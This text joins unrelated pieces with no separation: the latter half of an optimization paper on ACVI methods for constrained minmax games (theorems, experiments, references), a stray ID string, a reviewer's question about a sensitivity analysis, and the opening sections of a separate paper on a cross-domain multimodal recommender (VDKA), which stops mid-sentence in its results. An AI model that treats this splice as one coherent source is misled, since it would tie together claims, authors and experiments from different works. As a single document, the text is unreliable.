PI-ACVI. ![Figure 2: Intermediate iterates of PI-ACVI (Algorithm 2) on the 2D minmax game (2D-BG). The boundary of the constraint set is shown in red. (b) depicts the $y_k$ (from line 7 in Algorithm 2) which we obtain through projections. In (a), each spiral corresponds to iteratively solving the $x_k$ subproblem for $\ell = 20$ steps (line 6 in Algorithm 2). Jointly, the trajectories of $x$ and $y$ illustrate the ACVI dynamics: $x$ and the constrained $y$ “collaborate” and converge to the same point.] Last-iterate convergence of P-ACVI. The following theorem shows that P-ACVI has the same last-iterate rate as ACVI. Its proof can be derived from that of Theorem 3.1, which focuses on a more general setting, see App. B. We state it as a separate theorem, as it cannot be deduced directly from the statement of the former. **Theorem 4.1** (Last iterate convergence rate of P-ACVI—Algorithm 2). Given a continuous operator $F : \mathcal{X} \to \mathbb{R}^n$, assume $F$ is monotone on $\mathcal{C}_=$, as per Def. 2.1. Let $(x_K, y_K, \lambda_K)$ denote the last iterate of Algorithm 2. Then for all $K \in \mathbb{N}_+$, it holds that: $$G(x_K, \mathcal{C}) \leq O\left(\frac{1}{\sqrt{K}}\right), \text{ and } \|x^K - y^K\| \leq O\left(\frac{1}{\sqrt{K}}\right).$$ **Remark 4.2.** Note that Theorem 4.1 relies on weaker assumptions than Theorem 3.1. This is a ramification of removing the central path in the P-ACVI Algorithm. Thus, assumption (ii) in Theorem 3.1—used earlier to guarantee the existence of the central path (see App. A)—is not needed. ![Figure 3: Experiments on the (C-GAN) game, using GDA, EG, and PI-ACVI on MNIST. All curves are averaged over 4 seeds. (a): Frechet Inception Distance (FID, lower is better) given CPU wall-clock time. (b): Inception Score (IS, higher is better) given wall-clock time. We observe that PI-ACVI converges faster than EG and GDA for both metrics. Moreover, we see that using a large $\ell$ for the first iteration ($\ell_0$) can give a significant advantage. The two PI-ACVI curves use the same $\ell_+ = 20$.] Figure 4: Comparison between I-ACVI, (exact) ACVI, and projection-based algorithms on the (HBG) problem. (a): CPU time (in seconds) to reach a given relative error ($x$-axis), where the rotational intensity is fixed to $\eta = 0.05$ in (HBG) for all methods. (b): Number of iterations to reach a relative error of $0.02$ for varying values of the rotational intensity $\eta$. We fix the maximum number of iterations to $50$. (c): Joint impact of the number of inner-loop iterations $K_0$ at $t = 0$ and different choices of inner-loop iterations for $K_+$ at any $t > 0$ on the number of iterations needed to reach a fixed relative error of $10^{-4}$. We see that irrespective of the selection of $K_+$, I-ACVI converges fast if $K_0$ is large enough. For instance, $(K_0 = 130, K_+ = 1)$ converges faster than $(K_0 = 20, K_+ = 20)$. We fix $\ell = 10$ for all the experiments, in all of (a), (b), and (c). 5 EXPERIMENTS Methods. We compare ACVI, Inexact-ACVI (I-ACVI), and Projected-Inexact-ACVI (PI-ACVI) with the projected variants of Gradient Descent Ascent (P-GDA), Extragradient (Korpelevich, 1976) (P-EG), Optimistic-GDA (Popov, 1980) (P-OGDA), and Lookahead-Minmax (Zhang et al., 2019; Chavdarova et al., 2021) (P-LA). We always use GDA as an inner optimizer for I-ACVI, PI-ACVI, and P-ACVI. See App. D and C for comparison with additional methods and implementation. Problems. We study the empirical performance of these methods on three different problems: • 2D bilinear game: a version of the bilinear game with $L_\infty$ constraints, as follows $$\min_{x_1 \in \Delta} \max_{x_2 \in \Delta} x_1 x_2,$$ with $\Delta = \{x \in \mathbb{R} | -0.4 \leq x \leq 2.4\}$. (2D-BG) • High-dimensional bilinear game: where each player is a 500-dimensional vector. The iterates are constrained to the probability simplex. A parameter $\eta \in (0, 1)$ controls the rotational component of the game (when $\eta = 1$ the game is a potential, when $\eta = 0$ the game is Hamiltonian): $$\min_{x_1 \in \Delta} \max_{x_2 \in \Delta} \eta x_1^\top x_1 + (1 - \eta) x_1^\top x_2 - \eta x_2^\top x_2,$$ with $\Delta = \{x_i \in \mathbb{R}^{500} | x_i \geq 0, \text{ and } e^\top x_i = 1\}$. (HBG) • MNIST. We train GANs on the MNIST (Lecun & Cortes, 1998) dataset. We use linear inequality constraints and no equality constraints, as follows: $$\min_{G \in \Delta_G} \max_{D \in \Delta_D} \mathbb{E}_{s \sim p_d} [\log D(s)] + \mathbb{E}_{z \sim p_z} [\log(1 - D(G(z)))]$$ where $\Delta_\theta = \{\theta | A_1 \theta \leq b_1\}$, $\Delta_\zeta = \{\zeta | A_2 \zeta \leq b_2\}$, with $p_z$, $p_d$ respectively, noise and data distributions; $\theta$ and $\zeta$ are the parameters of the generator and discriminator, resp. $D$ and $G$ are the Generator and Discriminator maps, parameterized with $\theta$ and $\zeta$, resp. $A_i \in \mathbb{R}^{100 \times n_i}$ and $b_i \in \mathbb{R}^{n_i}$, where $n_i$ is the number of parameters of $D$ or $G$. 5.1 INEXACT ACVI 2D bilinear game. In Fig. 1, we compare exact and inexact ACVI on the 2D-Bilinear game. Rather than solving the subproblems of I-ACVI until we reach appropriate accuracy of the solutions of the subproblems, herein, we fix the $K$ and $\ell$ number of iterations in I-ACVI. We observe how I-ACVI can converge following the central path when the inner loop of I-ACVI over $k \in [K]$ is solved with sufficient precision. The two parameters influencing the convergence of the iterates to the central path are $K$ and $\ell$, where the latter is the number of iterations to solve the two subproblems (line 8 and line 9 in Algorithm 1). Fig. 1 shows that small values such as $K = 20$ and $\ell = 2$ are sufficient for convergence for this purely rotational game. Nonetheless, as $K$ and $\ell$ decrease further, the iterates... of I-ACVI may not converge. This accords with Theorem 3.2, which indicates that the sum of errors is bounded only if $K$ is large. Hence, larger $K$ implies a smaller error. **HD bilinear game.** In Fig. 4(a) and Fig. 4(b) we compare I-ACVI with ACVI and the projection-based algorithms on the (HBG) problem. We observe that both ACVI and I-ACVI outperform the remaining baselines significantly in terms of speed of convergence measured in both CPU time and the number of iterations. Moreover, while I-ACVI requires more iterations than ACVI to reach a given relative error, those iterations are computationally cheaper relative to solving exactly each subproblem; hence, I-ACVI converges much faster than any other method. Fig. 4(c) aims to demonstrate that the subproblems of I-ACVI are suitable for warm-starting. Interestingly, we notice that the choice of the number of iterations at the first step $t = 0$ plays a crucial role. Given that we initialize variables at each iteration with the previous solution, it aids the convergence to solve the subproblems as accurately as possible at $t = 0$. This initial accuracy reduces the initial error, subsequently decreasing the error at all subsequent iterations. We revisit this observation in § 5.3. ### 5.2 Projected-Inexact-ACVI **2D bilinear game.** In Fig. 2 we show the dynamics of PI-ACVI on the 2D game defined by (2D-BG). Compared to ACVI in Fig. 1, the iterates converge to the solution without following the central path. A comparison with other optimizers is available in App. D. **MNIST.** In Fig. 3 we compare PI-ACVI and baselines on the (C-GAN) game trained on the MNIST dataset. We employ the greedy projection algorithm (Beck, 2017) for the projections. Since ACVI was derived primarily for handling general constraints, a question that arises is how it (and its variants) performs when the projection is fast to compute. Although the projection is fast to compute for these experiments, PI-ACVI converges faster than the projection-based methods. Compared to the projected EG method, which only improves upon GDA when the rotational component of $F$ is high, it gives more consistent improvements over the GDA baseline. ### 5.3 Effect of Warm-up on I-ACVI and PI-ACVI **I-ACVI.** The experiments in Fig. 1 motivate increasing the number of iterations $K$ only at the first iteration $t = 0$—denoted $K_0$, so that the early iterates are close to the central path. Recall that the $K$ steps (corresponding to line 7 in Algorithm 1) bring the iterates closer to the central path as $K \to \infty$ (see App. B). After those $K_0$ steps, $\mu$ is decayed, which moves the problem’s solution along the central path. For I-ACVI, from Fig. 4(c)—where $\ell$ is fixed to 10—we observed that regardless of the selected value of $K_+$ for $t > 0$, it can be compensated by a large enough $K_0$. **PI-ACVI.** We similarly study the impact of the warmup technique for the PI-ACVI method (Algorithm 2). Compared to I-ACVI, this method omits the outer loop over $t \in [T]$. Hence, instead of varying $K_0$, we experiment with increasing the first $\ell$ at iteration $k = 0$, denoted by $\ell_0$. In Fig. 3 we solve the constrained MNIST problem with PI-ACVI using either $\ell_0 = 500$ or $\ell_0 = 100$, $\ell_+$ is set to 20 in both cases. Increasing the $\ell_0$ value significantly improves the convergence speed. **Conclusion.** We observe consistently that using a large $K_0$ or I-ACVI, or large $\ell_0$ for PI-ACVI aids the convergence. Conversely, factors such as $l$ and $K_+$ in I-ACVI, or $\ell_+$ in PI-ACVI, exert a comparatively lesser influence. Further experiments and discussions are available in App. D. ### 6 Discussion We contributed to an emerging line of research on the ACVI method, showing that the last iterate of ACVI converges at a rate of order $O(1/\sqrt{K})$ for monotone VIs. This result is significant because it does not rely on the first-order smoothness of the operator, resolving an open problem in the VI literature. To address subproblems that cannot always be solved in closed form, we introduced an inexact ACVI (I-ACVI) variant that uses warm-starting for its subproblems and proved last iterate convergence under certain weak assumptions. We also proposed P-ACVI for simple inequality constraints and showed that it converges with $O(1/\sqrt{K})$ rate. Our experiments provided insights into I-ACVI’s behavior when subproblems are solved approximately, emphasized the impact of warm-starting, and highlighted advantages over standard projection-based algorithms. ACKNOWLEDGMENTS We acknowledge support from the Swiss National Science Foundation (SNSF), grants P2ELP2_199740 and P500PT_214441. The work of T. Yang is supported in part by the NSF grant CCF-2007911 to Y. Chi. REFERENCES Yossi Arjevani, Shai Shalev-Shwartz, and Ohad Shamir. On lower and upper bounds for smooth and strongly convex optimization problems. In JMLR, 2016. Wäiss Azizian, Ioannis Mitliagkas, Simon Lacoste-Julien, and Gauthier Gidel. A tight and unified analysis of gradient-based methods for a whole spectrum of differentiable games. In AISTATS, pp. 2863–2873, 2020. Amir Beck. First-Order Methods in Optimization. SIAM, 2017. Amir Beck and Marc Teboulle. Mirror descent and nonlinear projected subgradient methods for convex optimization. Oper. Res. Lett., 31(3):167–175, 2003. Dimitri Bertsekas, Angelia Nedic, and Asuman Ozdaglar. Convex Analysis and Optimization, volume 1. Athena Scientific, 2003. Radu Ioan Bot, Ernö Robert Csetnek, and Phan Tu Vuong. The forward-backward-forward method from continuous and discrete perspective for pseudo-monotone variational inequalities in Hilbert spaces. arXiv:1808.08084, 2020. Radu Ioan Bot, Ernö Robert Csetnek, and Dang-Khoa Nguyen. Fast OGDA in continuous and discrete time. arXiv preprint arXiv:2203.10947, 2022. Stephen Boyd and Lieven Vandenberghe. Convex Optimization. Cambridge university press, 2004. Stephen Boyd, Neal Parikh, Eric Chu, Borja Peleato, and Jonathan Eckstein. Distributed optimization and statistical learning via the alternating direction method of multipliers. Foundations and Trends in Machine Learning, 3, 2011. ISSN 1935-8237. doi: 10.1561/2200000016. Yang Cai, Argyris Oikonomou, and Weiqiang Zheng. Tight last-iterate convergence of the extragradient method for constrained monotone variational inequalities. arXiv:2204.09228, 2022. Tatjana Chavdarova, Gauthier Gidel, François Fleuret, and Simon Lacoste-Julien. Reducing noise in GAN training with variance reduced extragradient. In NeurIPS, 2019. Tatjana Chavdarova, Matteo Pagliardini, Sebastian U Stich, François Fleuret, and Martin Jaggi. Taming GANs with Lookahead-Minmax. In ICLR, 2021. Tatjana Chavdarova, Michael I. Jordan, and Manolis Zampetakis. Last-iterate convergence of saddle point optimizers via high-resolution differential equations. In Minimax Theory and its Applications, 2023. Xiaojun Chen, Liqun Qi, and Defeng Sun. Global and superlinear convergence of the smoothing newton method and its application to general box constrained variational inequalities. Mathematics of Computation, 67(222):519–540, 1998. Rune Christiansen, Niklas Pfister, Martin Emil Jakobsen, Nicola Gnecco, and Jonas Peters. A causal framework for distribution generalization. arXiv:2006.07433, 2020. Liang-Ju Chu. On the continuity of trajectories for nonlinear monotone complementarity problems. Scientiae Mathematicae, 1(3):263–275, 1998. Richard W. Cottle and George B. Dantzig. Complementary pivot theory of mathematical programming. Linear Algebra and its Applications, 1(1):103–125, 1968. ISSN 0024-3795. Constantinos Daskalakis and Ioannis Panageas. Last-iterate convergence: Zero-sum games and constrained min-max optimization. In ITCS, 2019.
SerYSFntLh
In the sensitivity analysis, the model performance has ups and downs instead of rising and then stopping or no obvious change as described in the paper. How to explain this phenomenon? In addition, when taking two extreme values (0.2 and 1.0), the performance difference on some datasets(such as lambda in book-domian) is very small. How to explain this?
Variational Disentangled Cross-domain Knowledge Alignment for Multimodal Recommendation Anonymous authors Paper under double-blind review Abstract Multimodal recommendation systems have been widely used in e-commerce and short video platforms. Due to the large differences in data volume and data distribution in different business scenarios, cross-domain recommendation is studied to improve the effect of target domain by using rich source domain data. Some studies use encoders to represent domain information and design knowledge alignment to achieve cross-domain knowledge transfer. However, simple information representation and alignment methods are easily affected by noisy information and lead to negative transfer problems. The distribution of features in different domains also has a large deviation, which affects the effective transfer of knowledge. Therefore, we propose a Variational Disentangled Cross-domain Knowledge Alignment Method (VDKA) for multimodal recommendation. Specifically, we propose a variational multimodal graph attention encoder, which consists of variational autoencoder and graph attention encoder. Variational encoder can learn domain sharing and domain specific representations under multimodal data utilization. Then we introduce variational optimization objectives and disentangled representation objectives to improve the accuracy of domain representation. Furthermore, in order to solve the problem of domain knowledge distribution drift, adversarial learning is designed to realize cross-domain knowledge alignment. We conducted comprehensive experiments on four real-world multimodal data sets, and the experimental results show that our proposed VDKA method outperforms other state-of-the-art models. Ablation experiments have verified the effectiveness of our various designs. 1 Introduction With the increasing richness of image, audio and text information, the recommendation model based on multi-modal data has gradually achieved better results (Wang et al., 2023; Yu et al., 2022). Compared with the single modal information, users are more likely to be attracted by the commodity display and function introduction in the video (Chen et al., 2022; Guo et al., 2022). Since these platforms have rich scenarios, the data amount and data distribution of each business scenario are quite different. Therefore, cross-domain recommendation has been attached importance to the study of how to use rich source domain data to improve the effect of target domain with sparse data (Kang et al., 2019; Cao et al., 2022b). Some methods mainly add multimodal data to the model as side information (Chen et al., 2019; Deldjoo et al., 2021). These models use visual and text encoders to extract semantic features from images and text, and cross with attribute feature construction features for prediction. The main idea of cross-domain recommendation is to transfer the source domain knowledge with rich feature information to the target domain, so as to improve the accuracy of matching items with users in the target domain (Zhu et al., 2021; 2022). Although the existing cross-domain research has achieved some results, there are still several problems in the multi-modal cross-domain recommendation. First of all, the key problem of cross-domain recommendation is how to use the knowledge of source domain to improve the model effect of target domain. Many methods map feature information to a semantic space directly using encoders and transfer knowledge by feature crossing or feature alignment on the representation of two domains. This rough representation method is easy to be disturbed by a lot of noisy information. Moreover, the knowledge contained in different domains may be contradictory, and simple information alignment is likely to cause negative transfer problems (Cao et al., 2022a; Zang et al., 2022). Second, although some methods design disentangled representation networks to map domain features to the same semantic space, the distribution of knowledge in different domains is still biased. Knowledge transfer on biased data distribution will lead to biased model learning. Thirdly, the effective utilization of different modal data is an important issue in the multi-modal recommendation, and it is not accurate to only take modal data as side information. Considering some of the key problems mentioned above, we propose a new solution. We propose a Variational Disentangled Cross-domain Knowledge Alignment Method (VDKA) for Multimodal Recommendation, which can effectively improve the multi-modal cross-domain recommendation effect. Specifically, we propose a variational multimodal graph attention encoder, which consists of variational autoencoder and graph attention encoder. Variational autoencoder is designed to learn domain-shared representations and domain-specific representations. Graph attention encoder is used to extract multi-modal feature information effectively. Then we introduce variational optimization objectives and disentangled representation objectives to improve the accuracy of domain-shared and domain-specific representations. Furthermore, in order to solve the problem of domain knowledge distribution drift, adversarial learning is designed to realize cross-domain knowledge alignment. Finally, we combine several optimization objectives as the loss function for model training. As a summary, the main contributions of this paper are as follows: - We propose a variational multimodal graph attention encoder. Specifically, variational autoencoder is designed to learn domain-shared representations and domain-specific representations. Graph attention encoder is used to extract multi-modal feature information effectively. - We propose a variational disentangled cross-domain knowledge alignment method (VDKA) for multimodal recommendation. VDKA uses variational encoders to extract domain-shared and domain-specific representations. The cross-domain knowledge alignment is further realized through adversarial learning. - We conducted comprehensive experiments on four real-world multimodal data sets. Experimental results show that our proposed VDKA method exceeds other state-of-the-art models. The ablation experiments have also verified the effect of each module proposed by us. We will make our data sets and code public to contribute to community development. 2 RELATED WORK As an important research direction in the field of recommendation, multimodal recommendation has been widely studied (Du et al., 2022; Yu et al., 2022; Han et al., 2022). A lot of research work is exploring the extraction and utilization of multimodal data to help models improve performance (Xu et al., 2023; Yu et al., 2022; Han et al., 2022). Some research methods add multimodal data as auxiliary features to the model and achieve results (Chen et al., 2019; Deldjoo et al., 2021). VBPR (He & McAuley (2016)) incorporates visual features extracted from product images into matrix decomposition to reveal the visual dimensions that most influence people’s behavior. Many work begin to use self-supervised comparative learning to solve problems such as data sparsity (Xie et al., 2022; Tao et al., 2022; Yu et al., 2021). MMGCL (Yi et al., 2022) designs two enhancement techniques, modal edge discard and modal mask, to generate multiple views of users and projects, and introduces a negative sampling technique to learn the correlation between modes. Many work using graph neural network to extract multi-modal information has achieved good results (Zhao & Wang, 2021; Yu et al., 2022; Wei et al., 2020). MMGCN (Wei et al., 2019) constructs a user-item dichotomous graph on each mode and enriches the representation of each node with the topology and characteristics of its adjacent nodes. MGAT (Tao et al., 2020) transmits information in a single graph, and uses the gated attention mechanism to identify the different importance scores of different patterns to user preferences. Many researches are exploring the use of source domain data information to improve the prediction effect of target domain, so as to achieve effective cross-domain recommendation (Hu et al., 2018; Zhao et al., 2019; Sheng et al., 2021). These studies focus on the extraction of domain information and the transfer of cross-domain knowledge. Some research work mainly uses encoders to learn domain representations and uses cross-transfer modules to achieve knowledge alignment (Wang et al., DDTCDR (Li & Tuzhilin, 2020) extends ConNet by learning a potential orthogonal projection function to migrate the similarity of users across domains. BITGCF (Liu et al., 2020) uses LightGCN (He et al., 2020) as an encoder to aggregate interactive information for each domain, and further introduces a feature transfer layer to enhance the two basic graph encoders. Some research work focuses on the disentangled of domain representation. CDRIB (Cao et al., 2022b) uses an information bottleneck perspective to obtain information shared between domains. DisenCDR (Cao et al., 2022a) proposes two mutual information based disentangled regularizers to separate domain sharing and domain specific information. DDGHM (Zheng et al., 2022) proposes dual dynamic graph modeling and mixed metric training to improve the cross-domain recommendation effect. UniCDR (Cao et al., 2023) can model different CDR scenarios generically by passing domain shared information. 3 PRELIMINARIES This paper mainly studies the cross-domain scenario of multimodal recommendation. Our proposed research method can be conveniently extended to multiple field scenarios. For simplicity, we focus on two domains that have a common set of users in this work. We let $D^A = (U^A, V^A, I^A)$ and $D^B = (U^B, V^B, I^A)$ represent the interaction data of domain A and domain B, respectively. $U$ denotes the shared user set in both domains, $V$ denotes the item set of each domain, and $I$ represents the interaction edge set in each domain. In addition, there are two binary matrices $Y^A \in \{0, 1\}^{U \times |V^A|}$ and $Y^B \in \{0, 1\}^{U \times |V^B|}$ representing the interaction matrices of domain A and B, respectively. $Y_{i,j}$ denotes whether a user $u_i$ has interacted with item $v_j$ in the edge set $I$. In addition, we focus on multimodal recommendation scenarios. In this paper, we mainly consider the use of visual and textual modal data. We represent the multimodal information as $x_m$, where $m \in M = \{v, t, a\}$. $v$ represents visual features, $t$ represents textual features, and $a$ represents acoustic features. 4 METHODOLOGY In this section, we give a detailed introduction to the proposed VDKA method. The overall architecture and components of the VDKA are shown in Fig. 1. ![Figure 1: Overall architecture and components of the proposed VDKA method.](image) 4.1 VARIATIONAL MULTIMODAL GRAPH ATTENTION ENCODER 4.1.1 VARIATIONAL AUTO-ENCODER Variational auto-encoder (VAE) is a combination of variational inference and auto-encoder, which is a kind of unsupervised generation model. VAE assumes that there exists an implicit variable $z$, and the marginal distribution \( P_\theta(x) \) can be calculated from \( P_\theta(x) = \sum_z P_\theta(x, z) \). The joint distribution \( P_\theta(x, z) = P_\theta(x|z)P(z) \) is satisfied between \( z \) and input \( x \). The distribution \( P(z) \) of the implicit variable \( z \) is assumed to satisfy a Gaussian distribution with a mean of zero and a variance of the unit vector. If an attempt is made to build a neural network approximating \( P_\theta(x|z) \) without a suitable loss function, it will ignore \( z \) and yield the trivial solution \( P_\theta(x|z) = P_\theta(x) \). Therefore, this approach does not provide a good estimate of \( P_\theta(x) \). The marginal distribution can be expressed in another form as \( P_\theta(x) = \sum_x P_\theta(z|x)P(x) \). However, \( P_\theta(z|x) \) is also difficult to solve. The goal of VAE is to find an estimable distribution that approximates \( P_\theta(z|x) \), that is, an estimate of the conditional distribution of a latent variable \( z \) given the input \( x \). Therefore, based on variational inference and Bayes’ theorem, the variational loss function can be obtained as follows: \[ L_{VAE} = E_{Q_\phi(z|x)}[\log P_\theta(x|z)] - D_{KL}(Q_\phi(z|x)||P(z)) \leq \log P_\theta(x) \] (1) The left side of the above equation is also called the evidence lower bound (ELBO). The inference model generates implicit variables \( z \) from input \( x \), and \( Q_\phi(z|x) \) is similar to the encoder in the autoencoder model. \( P_\theta(x|z) \) is similar to a decoder that extracts a sample from the inference model to reconstruct the input. To make the lower bound differentiable under the encoder parameter, the reparameterization trick is used to solve: \[ z = \mu_\phi(x) + \sigma_\phi(x) \odot \epsilon \quad \text{where} \quad \epsilon \sim N(0, 1) \] (2) where \( \odot \) denotes the Hadamard product. \( \mu \) and \( \sigma \) represent the mean and variance of the multivariate Gaussian distribution corresponding to the latent variable \( z \). ### 4.1.2 Multimodal Graph Attention Encoder In the multimodal scenario, users have different preferences for information of different modalities. However, simple modal representation cannot accurately describe the user’s modal preference. We represent the interaction information as a bipartite user-item graph \( G = \{(u, i)|u \in U, i \in I\} \), where \( U \) denotes the user set and \( I \) denotes the item set. We represent the set of modalities as \( M \in \{v, t, a\} \), including visual features \( v \), textual features \( t \) and acoustic features \( a \). Then, we design a multimodal graph attention encoder to learn representation vectors. The design details of the graph attention encoder are provided in Appendix D. Based on the above graph attention method, we can obtain the representation matrix \( H \in R^{|U|\times d} \) of multi-modal importance perception. Further, we bring \( H^A \) belongs to domain \( A \) into the variational autoencoder in Section 4.1.1 to generate the implicit variable \( Z \) as follows: \[ \mu^A = \phi(W^A_\mu H^A); \sigma^A = \phi(W^A_\sigma H^A); Z^A \sim N(\mu^A, [\text{diag}\{\sigma^A\}]^2) \] (3) where \( W^A_\mu \) and \( W^A_\sigma \) represent the parameter matrix. By performing variational graph attention encoding for data in both domains, the representations \( Z^A \) and \( Z^B \) can be obtained. ### 4.2 Domain-shared and Domain-specific Representation Learning Since the source domain and the target domain often have a big distribution difference, it is necessary to map the cross-domain information to the same semantic space to realize knowledge transfer. However, it is difficult to ensure that encoders can accurately represent cross-domain data in a semantic space. In addition, even if cross-domain data can be converted into lower-dimensional semantic space, the problem of domain distribution drift still exists. Therefore, in order to carry out cross-domain knowledge transfer accurately and effectively, we consider the disentangled learning of domain-shared representation and domain-specific representation. Domain-shared representation means common knowledge with the same semantic structure in multiple domains, and domain-specific representation means specific semantic knowledge unique only in a single specific domain. When domain representations with common semantic structure are extracted, domain knowledge transfer will be more effective to avoid negative transfer caused by useless cross-modal information. #### 4.2.1 Variational Encoding Objective Variational multimodal graph attention encoders provide a latent representation of multimodal perception. The latent variable \( z \) can be inferred by an encoder with an approximate distribution of Based on the above analysis, we believe that there are modal shared implicit representations \( z_c \) with common semantic structure and modal specific implicit representations \( z_s \) with independent semantic structure on cross-domain data. For each variational encoder, there will be two branches to construct hidden variables \( z_c \) and \( z_s \) respectively. The joint probability distribution satisfied between variables is shown as follows: \[ P_\theta(x, z_c, z_s) = P_\theta(x|z_c, z_s)P(z_c)P(z_s) \] (4) where \( P(z_c) \) and \( P(z_s) \) represent prior distributions, which satisfy the Gaussian distribution with zero mean and unit variance. The distribution \( P_\theta(x|z_c, z_s) \) can be seen as the generation distribution. Further, the distribution \( q_\phi(z_c, z_s|x) \) can be converted to: \[ Q_\phi(z_c, z_s|x) = Q_\phi(z_c|x)Q_\phi(z_s|x) \] (5) where \( Q_\phi(z_c|x) \) and \( q_\phi(z_s|x) \) obey the Gaussian distribution, whose parameters are derived from the encoder output. Therefore, we rewrite VAE loss function in Section 4.2.1 to obtain the loss function based on latent variables \( z_c \) and \( z_s \) as follows: \[ L_V = E_{Q_\phi(z_c,z_s|x)}[\log P_\theta(x|z_c, z_s)] - D_{KL}(Q_\phi(z_c|x)||P(z_c)) - D_{KL}(Q_\phi(z_s|x)||P(z_s)) \] (6) In particular, since we focus on the representation of multiple domains, we can obtain the loss function \( L^A_V \) of domain A, and the loss function \( L^B_V \) of domain B. ### 4.2.2 Disentangled Representation Objective In order to make full use of cross-domain information, we introduce information bottleneck theory to capture the correlation between domains. Specifically, we construct intra-domain and inter-domain information bottleneck regularizations from two different perspectives. **Intra-domain information bottleneck regularization.** To ensure that the disentangled representation has the ability to recover the original feature information, we need to construct reconstruction targets for constraint. For instance, for the data \( X^A \) of domain A, we can get the corresponding domain shared representation \( Z^A_c \) and domain specific representation \( Z^A_s \). We expect representation \( Z^A_c \) and representation \( Z^A_s \) to differ sufficiently to contain only domain-shared semantic information and domain-specific semantic information, respectively. We want \( Z^A_c \) and \( Z^A_s \) combined to have as little difference from \( X^A \) as possible, meaning that the two representations can reconstruct the original feature information. Therefore, the regular loss of the intra-domain information bottleneck is defined as follows: \[ L_{intra} = I(Z^A_c; Z^A_s) - I(Z^A_c, Z^A_s; X^A) \] (7) where \( I \) represent the mutual information operator. **Inter-domain information bottleneck regularization.** For the shared representation \( Z^A_c \) extracted from domain A, we believe that mutual information should be maximized with the shared representation \( Z^B_c \) extracted from domain B. According to the shared representation \( Z^B_c \) extracted from domain B and the specific representation \( Z^A_s \) extracted from domain A, the original feature information \( X^A \) of domain A should be reconstructed. Similarly, the original feature information \( X^B \) of domain B should be reconstructed according to the shared representation \( Z^A_c \) extracted from domain A and the specific representation \( Z^B_s \) extracted from domain B. Introducing these reconstruction objectives enables the model to make full use of cross-modal information for knowledge transfer while learning accurate domain sharing and domain specific representations. Inter-modal information bottleneck regularization loss is defined as follows: \[ L_{inter} = -I(Z^A_c; Z^B_c) - I(Z^B_c, Z^A_s; X^A) - I(Z^A_c, Z^B_s; X^B) \] (8) We combine intra-domain and inter-domain information bottleneck losses together as the disentangled optimization loss \( L_D \). 4.3 Cross-domain Knowledge Alignment There are great differences in data distribution and data sparsity among different domains, which makes the information in different fields have the problem of native semantic space heterogeneity. Therefore, we consider introducing adversarial learning to realize cross-domain learning. Instead of learning directly based on unconstrained implicit representation, we hope to reduce the distribution bias between $z^A_c$ and $z^B_c$. According to the covariate drift hypothesis, consistent optimization of source domain and target domain can make the predicted results of the two domains consistent. Motivated by (Long et al., 2018), we introduce domain discriminator to optimize domain differences. One way to estimate the difference is to look at the loss of the domain classifier $G_d$, provided that the domain classifier’s parameter $\theta_d$ has been trained to differentiate optimally between the two feature distributions. In order to reduce the distribution difference between $z^A_c$ and $z^B_c$, we seek the domain classifier parameter $\theta_d$ which minimizes the loss of the domain classifier. Optimization objectives based on domain discrimination can be expressed as: $$E(\theta_f, \theta_y, \theta_d) = E(\theta_f, \theta_y, \hat{\theta}_d) + E(\hat{\theta}_f, \theta_y, \theta_d)$$ $$E(\theta_f, \theta_y, \theta_d) = L_y(G_y(z^A_c, z^A_s, \theta_y)) - \lambda \sum_{i \in A} (G_d(z^A_{c,i}, \theta_d)) - \lambda \sum_{i \in B} (G_d(z^B_{c,i}, \theta_d))$$ where $L_y$ represents the model prediction loss function. $z^A_{c,i}$ denotes the domain-shared representation of sample $i$ from domain A. $\hat{\theta}_f$ represents the optimized feature encoder parameter that generates $z_c$. $\hat{\theta}_f$ represents the optimized predict network parameter used to minimize the loss of model prediction. $\hat{\theta}_d$ represents the optimized parameter of the discriminant network $G_d$, which is used to maximize the domain classification loss. Since the learning objective of the discriminator is opposite to that of the main task, gradient inversion layer (GRL) (Long et al., 2018) is introduced to facilitate effective parameter updating. We let the optimization objective $E(\theta_f, \theta_y, \theta_d)$ as the knowledge alignment loss $L_A$. 4.4 Optimization In this paper, a variational multimodal graph attention encoder is introduced to extract multimodal information and construct domain-shared and domain-specific representations. The designed variational optimization objective can guide the model to learn accurate and effective feature representation. We denote the main loss of interaction prediction classification task as $L_y$. The final optimized loss function can be expressed as follows: $$L = L_y + \alpha(L^A_V + L^B_V) + \gamma L_D - \lambda L_A$$ where $\alpha$, $\gamma$ and $\lambda$ represent hyperparameters that control the weight of different losses. 5 Experiments In this section, we conduct extensive experiments to answer the following questions: - **RQ1** How does our VDKA model perform compared to the cross-domain and multi-modal state-of-the-art methods? - **RQ2** How do different designs (e.g. variational encoding, disentangled representation and knowledge alignment) affect the performance of the VDKA model? - **RQ3** How do the hyperparameter settings in the model affect the model performance? - **RQ4** How does our approach contribute to cross-domain improvement? 5.1 Experimental Setup **Datasets.** We chose the Amazon dataset[^1] as the experimental dataset. Amazon dataset (Lakkaraju et al., 2013) is the real dataset extracted from e-commerce platform. Specifically, we select data [^1]: [http://jmcauley.ucsd.edu/data/amazon/](http://jmcauley.ucsd.edu/data/amazon/) Table 1: Statistics of the four datasets. | Cross-domain | Domain1-Items | Domain2-Items | Overlapped-Users | Train | Valid | Test | |------------------|---------------|---------------|------------------|---------|-------|-------| | Movie & Book | 58,371 (Movie)| 104,895 (Book)| 12,746 | 118,779 | 23,756| 15,838| | Food & Kitchen | 47,520 (Food) | 53,361 (Kitchen)| 8,575 | 50,845 | 10,169| 6,779 | sets in four domains from Amazon dataset as experimental data, including Movie, Book, Food and Kitchen. We pair data sets to construct cross-domain data sets “Movie & Book” and “Food & Kitchen”. Text semantic representation is generated by Sentence-Bert. The statistical results are shown in Table 1. Evaluation metrics. Following related work (Cao et al., 2022a), we choose four widely used evaluation metrics, including Hit Rate (HR), Normalized Discounted Cumulative Gain (NDCG) and Mean Reciprocal Rank (MRR). We set the length of ranked list as 20. The implementation details are provided in Appendix B. Baseline methods. To evaluate the performance, we compared the proposed VDKA model with three types of baselines: (1) CF-based methods, i.e., BPRMF (Rendle et al., 2012) and NGCF (Wang et al., 2019). (2) Multi-modal the state-of-the-art methods, i.e., MMGCL (Yi et al., 2022), LATTICE (Zhang et al., 2021) and HCGCN (Mu et al., 2022)). (3) Cross-domain the state-of-the-art methods, i.e., DDTCDR (Li & Tuzhilin, 2020), BiTGCf (Liu et al., 2020), DisenCDR (Cao et al., 2022a) and DDGHM (Zheng et al., 2022)). The details of baselines are provided in Appendix A. 5.2 Performance comparisons (RQ1) We conducted a comprehensive experiment on two pairs of cross-domain datasets and compared our proposed VDKA method with other baseline methods. The experimental results are shown in Table 2. From the observation of the experimental results, we have the 